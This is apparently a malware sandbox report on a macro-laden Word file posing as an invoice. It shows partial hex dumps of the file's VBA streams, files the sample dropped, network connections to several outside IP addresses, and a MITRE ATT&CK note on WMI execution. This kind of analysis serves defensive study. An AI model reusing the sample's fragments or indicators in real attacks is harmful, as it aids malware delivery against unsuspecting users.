Data Raw:	cc 61 af 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

General
Stream Path:	Macros/VBA/__SRP_0
File Type:	data
Stream Size:	1975
Entropy:	4.623946704589897
Base64 Encoded:	False
Data ASCII:	K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ d . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . . ! N < c L . . . . . . . . . . . . . . . . . . . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	93 4b 2a af 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00

General
Stream Path:	Macros/VBA/__SRP_1
File Type:	data
Stream Size:	191
Entropy:	2.6043883713669818
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L x i j u p n g v . . . . ! . . . . . . . . . . . . . . ( . . . . . . . d . . . . . . .
Data Raw:	72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 01 00 00 7e 01 00 00 7e 79 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 03 00 00 09 31 03 00 00 00 00 00 00 f9 09 00 00 00 00 00 00 08 00 00 00 00 00 01 00 03 00 00 09 21 07 00 00 00 00 00 00 89 0a 00 00 00 00

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report INV_PO_12172019EX.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FD181C6.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3AE7B0F.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4D8C8B4D-2408-4479-B193-86C1187A3D7D}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{98B5056E-1AC7-42C9-BDDC-599C5AB91B4A}.tmp

C:\Users\user\AppData\Local\Temp\VBE\INKEDLib.exd

C:\Users\user\AppData\Local\Temp\Word8.0\MSForms.exd

C:\Users\user\AppData\Local\Temp\~DF413F6883B338D566.TMP

C:\Users\user\AppData\Local\Temp\~DF9A691EC184F6B5B3.TMP

C:\Users\user\AppData\Local\Temp\~DFA8E9CC93153586F4.TMP

C:\Users\user\AppData\Local\Temp\~DFAAA31D5F4A1B1B2F.TMP

C:\Users\user\AppData\Local\Temp\~DFD6589A193BC4C172.TMP

C:\Users\user\AppData\Local\Temp\~DFF8750E7A0A2DF968.TMP

C:\Users\user\AppData\Roaming\Microsoft\Forms\INKEDLib.exd

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\INV_PO_12172019EX.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LDV95WB5GH1Q7ECQYL9V.temp

C:\Users\user\Desktop\~$V_PO_12172019EX.doc

Static File Info

Windows Analysis Report
INV_PO_12172019EX.doc

General
Stream Path:	Macros/VBA/__SRP_2
File Type:	data
Stream Size:	440
Entropy:	2.3806145775909835
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Y . . . . . . . . . . . 4 . . . . . . . . . . a . . . . . . . ! . . . . . . . . . . . . . . . . ` . . . . . . . . . . . < . . . A . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . . . . . . y . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 01 00 01 00 00 00 00 00 01 00 01 00 00 00 02 00 81 09 00 00 00 00 00 00 a9 09 00 00 00 00 00 00 d1 09 00 00 00 00 00 00 09 00 00 00 01 00 02 00 59 09 00 00 00 00 00 00 08 00 0d 00 34 00 00 00 f9 09 00 00 00 00 00 00 61 00 00 00 00 00

General
Stream Path:	Macros/VBA/__SRP_3
File Type:	data
Stream Size:	142
Entropy:	2.3857723234419117
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . $ . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . 8 . . . . . . . n . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 48 00 00 00 04 00 24 00 b9 01 00 00 00 00 02 00 00 00 04 60 00 00 10 07 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 01 00 20 00 a1 00 00 00 00 00 01 00 ff ff ff ff 00 00 00 00 00 00 04 40 02 00 04 07 1d c1 00 00 00 00 00 01 00 38 00

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	1100
Entropy:	6.588091810909644
Base64 Encoded:	True
Data ASCII:	. H . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . ! _ . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ s y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * , \\ C . . . . . m . . A ! O f f i c g O D . f . i . c g .
Data Raw:	01 48 b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 eb 21 e1 5f 14 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

General
Stream Path:	ObjectPool/_1638126958/\x3OCXNAME
File Type:	data
Stream Size:	22
Entropy:	2.272808148826652
Base64 Encoded:	False
Data ASCII:	L . x . i . j . u . p . n . g . v . . . . .
Data Raw:	4c 00 78 00 69 00 6a 00 75 00 70 00 6e 00 67 00 76 00 00 00 00 00

General
Stream Path:	ObjectPool/_1638126958/contents
File Type:	data
Stream Size:	64
Entropy:	3.000394047763189
Base64 Encoded:	False
Data ASCII:	. . . . . . @ . . . . . H , . . . . . . . . . . . P . . . . . . . 7 . . . . . . . . @ . . . . . . . C a l i b r i .
Data Raw:	00 02 1c 00 01 01 40 80 00 00 00 00 1d 48 80 2c 01 00 00 80 1a 00 00 00 1a 00 00 00 50 00 00 00 00 02 1c 00 37 00 00 00 07 00 00 80 00 20 00 40 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 00

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	4096
Entropy:	1.3697220539987924
Base64 Encoded:	False
Data ASCII:	. s . . . . . . . . . . . . . . . . . . . . . ' . . . . . b j b j 2 ) 2 ) . . . . . . . . . . . . . . . . . . . . . . . . . . P C f P C f ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . .
Data Raw:	ec a5 c1 00 73 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 27 08 00 00 0e 00 62 6a 62 6a 32 29 32 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 50 43 99 66 50 43 99 66 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2023 18:14:14.719769955 CET	49173	80	192.168.2.22	103.224.212.222
Feb 7, 2023 18:14:14.885829926 CET	80	49173	103.224.212.222	192.168.2.22
Feb 7, 2023 18:14:14.886035919 CET	49173	80	192.168.2.22	103.224.212.222
Feb 7, 2023 18:14:14.895281076 CET	49173	80	192.168.2.22	103.224.212.222
Feb 7, 2023 18:14:15.102181911 CET	80	49173	103.224.212.222	192.168.2.22
Feb 7, 2023 18:14:15.119752884 CET	80	49173	103.224.212.222	192.168.2.22
Feb 7, 2023 18:14:15.119781971 CET	80	49173	103.224.212.222	192.168.2.22
Feb 7, 2023 18:14:15.119842052 CET	49173	80	192.168.2.22	103.224.212.222
Feb 7, 2023 18:14:15.120667934 CET	49173	80	192.168.2.22	103.224.212.222
Feb 7, 2023 18:14:15.285584927 CET	80	49173	103.224.212.222	192.168.2.22
Feb 7, 2023 18:14:15.304344893 CET	49174	80	192.168.2.22	13.248.148.254
Feb 7, 2023 18:14:15.324196100 CET	80	49174	13.248.148.254	192.168.2.22
Feb 7, 2023 18:14:15.324350119 CET	49174	80	192.168.2.22	13.248.148.254
Feb 7, 2023 18:14:15.324487925 CET	49174	80	192.168.2.22	13.248.148.254
Feb 7, 2023 18:14:15.344772100 CET	80	49174	13.248.148.254	192.168.2.22
Feb 7, 2023 18:14:15.466506958 CET	80	49174	13.248.148.254	192.168.2.22
Feb 7, 2023 18:14:15.560751915 CET	49175	80	192.168.2.22	162.212.129.161
Feb 7, 2023 18:14:15.672749996 CET	80	49174	13.248.148.254	192.168.2.22
Feb 7, 2023 18:14:15.672928095 CET	49174	80	192.168.2.22	13.248.148.254
Feb 7, 2023 18:14:15.686521053 CET	80	49175	162.212.129.161	192.168.2.22
Feb 7, 2023 18:14:15.686666012 CET	49175	80	192.168.2.22	162.212.129.161
Feb 7, 2023 18:14:15.686811924 CET	49175	80	192.168.2.22	162.212.129.161
Feb 7, 2023 18:14:15.812516928 CET	80	49175	162.212.129.161	192.168.2.22
Feb 7, 2023 18:14:15.816334009 CET	80	49175	162.212.129.161	192.168.2.22
Feb 7, 2023 18:14:15.906567097 CET	49175	80	192.168.2.22	162.212.129.161
Feb 7, 2023 18:14:15.906641006 CET	49174	80	192.168.2.22	13.248.148.254

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2023 18:14:12.096406937 CET	55868	53	192.168.2.22	8.8.8.8
Feb 7, 2023 18:14:12.119050980 CET	53	55868	8.8.8.8	192.168.2.22
Feb 7, 2023 18:14:12.196402073 CET	49688	53	192.168.2.22	8.8.8.8
Feb 7, 2023 18:14:12.238814116 CET	53	49688	8.8.8.8	192.168.2.22
Feb 7, 2023 18:14:12.240439892 CET	137	137	192.168.2.22	192.168.2.255
Feb 7, 2023 18:14:12.998070955 CET	137	137	192.168.2.22	192.168.2.255
Feb 7, 2023 18:14:13.762510061 CET	137	137	192.168.2.22	192.168.2.255
Feb 7, 2023 18:14:14.536828995 CET	58836	53	192.168.2.22	8.8.8.8
Feb 7, 2023 18:14:14.708704948 CET	53	58836	8.8.8.8	192.168.2.22
Feb 7, 2023 18:14:15.125154018 CET	50134	53	192.168.2.22	8.8.8.8
Feb 7, 2023 18:14:15.303457975 CET	53	50134	8.8.8.8	192.168.2.22
Feb 7, 2023 18:14:15.476758957 CET	55275	53	192.168.2.22	8.8.8.8
Feb 7, 2023 18:14:15.555291891 CET	53	55275	8.8.8.8	192.168.2.22
Feb 7, 2023 18:14:15.821939945 CET	59915	53	192.168.2.22	8.8.8.8
Feb 7, 2023 18:14:15.843313932 CET	53	59915	8.8.8.8	192.168.2.22
Feb 7, 2023 18:14:35.652678967 CET	138	138	192.168.2.22	192.168.2.255
Feb 7, 2023 18:16:05.690131903 CET	138	138	192.168.2.22	192.168.2.255

Target ID:	0
Start time:	18:13:18
Start date:	07/02/2023
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f060000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre